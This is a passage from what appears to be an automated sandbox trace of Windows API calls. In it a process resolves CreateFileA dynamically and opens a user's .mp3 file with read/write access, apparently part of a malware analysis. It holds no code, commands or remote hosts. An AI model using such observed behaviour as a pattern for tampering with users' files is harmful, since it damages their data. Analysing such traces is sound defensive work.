(HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9b68 [0187.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.119] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0187.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0187.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.120] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0187.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0187.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0187.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5d78 [0187.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", cchWideChar=94, lpMultiByteStr=0x9a5d78, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", lpUsedDefaultChar=0x0) returned 94 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.121] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\uvlmhuumlbjpgdhq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=94, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xbc) returned 0x9c3540 [0187.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=94, lpWideCharStr=0x9c3540, cchWideChar=94 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3") returned 94 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.124] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0187.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.126] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0187.126] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.127] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.128] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0187.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.128] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0187.128] RtlAllocateHeap 